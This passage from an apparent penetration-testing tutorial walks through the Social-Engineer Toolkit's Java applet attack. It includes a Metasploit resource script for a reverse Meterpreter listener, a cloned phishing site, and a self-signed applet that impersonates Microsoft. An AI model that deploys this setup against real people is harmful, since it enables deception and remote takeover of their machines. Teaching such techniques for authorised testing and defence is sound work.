The Social-Engineer Toolkit
As with other SET attack methods, attackers can use a variety of payloads. The default reverse Meterpreter payload is usually an excellent selection. For this scenario, you can simply accept the defaults when prompted for the encoder to use and for the port on which the payload should reconnect.
With the configuration complete, SET launches Metasploit:
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler...
msf exploit(handler) >
SET passes all necessary options to Metasploit, which then sets up the reverse Meterpreter listener on port 443.
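For reference, here is what the handler SET starts amounts to, written as an msfconsole resource script you could load yourself with msfconsole -r. This is an added example, not SET's generated meta_config file: the listener address 10.10.1.112 and port 443 are taken from the output above, and the payload name windows/meterpreter/reverse_tcp is assumed to be SET's default reverse Meterpreter.

```text
# handler.rc - added example of a Metasploit resource script that
# reproduces the handler SET launches; not SET's own generated file.
# Load with: msfconsole -r handler.rc
use exploit/multi/handler
# Assumed: SET's default reverse Meterpreter payload for Windows
set PAYLOAD windows/meterpreter/reverse_tcp
# Listener address and port, as shown in the output above
set LHOST 10.10.1.112
set LPORT 443
# Keep the handler listening after the first session arrives
set ExitOnSession false
# -j runs the handler as a background job, -z avoids interacting with
# the first session automatically
exploit -j -z
```

ExitOnSession false matters when the handler runs as a job: without it the listener exits after the first target connects, and any later clicks on the applet prompt never produce a session.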
NOTE
You have created a web server housing a cloned instance of http://www.secmaniac.com/. If you had changed the configuration file to include WEBATTACK_EMAIL=ON, you would have been prompted to send an email using the spear-phishing attack vector (minus attachments).
Now that everything is set up, you simply need to get a target to browse to the malicious site. Upon reaching the website, the target sees a pop-up warning naming the publisher as Microsoft, as shown in Figure 10-2. If the target clicks Run, and most users will, the payload is executed and you get a Meterpreter session on the user's system, running with the privileges of the logged-in user.
NOTE
Recall that SET's configuration lets you self-sign the Java applet with whatever publisher name you want; the "Microsoft" in the prompt comes from that self-signed certificate, not from a trusted CA. Remember, too, that when the target clicks Run and the payload is executed and delivered, the target is redirected to the legitimate SecManiac website, so nothing on screen looks out of place. Note that Java 7 Update 51 and later block self-signed applets at the default security level, so this prompt appears only on older or deliberately relaxed Java installations.
Figure 10-2: Java applet prompt